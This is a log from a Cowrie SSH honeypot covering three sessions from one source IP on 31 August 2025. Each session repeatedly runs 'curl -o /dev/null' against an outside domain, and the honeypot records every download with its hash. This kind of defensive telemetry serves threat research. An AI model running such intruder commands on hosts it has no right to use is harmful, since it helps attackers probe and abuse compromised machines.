{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.084092Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.085020Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.087667Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.088182Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.092154Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.095142Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.121343Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.122013Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.123991Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.124616Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.126596Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.127349Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.129744Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.131812Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.158804Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.159464Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.162119Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.162583Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.164877Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.168488Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.170422Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.170955Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.174226Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.240144Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.240909Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.242604Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.243345Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.249918Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.251657Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.253994Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.254412Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.283644Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.284703Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.285363Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.289592Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.290238Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.293282Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.294326Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.295072Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.297772Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.300853Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.325852Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.326530Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.329939Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.330470Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.334567Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.336755Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.338994Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.339663Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.342678Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.366819Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.367344Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.368974Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.369644Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.374883Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.376736Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.381626Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.400046Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.400789Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.406636Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.409610Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.410576Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.411194Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.414423Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.414982Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.418691Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.441559Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.442120Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.448333Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.452773Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.457766Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.458405Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.460874Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.461396Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.485906Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.486561Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.491963Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.493665Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.496596Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.497420Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
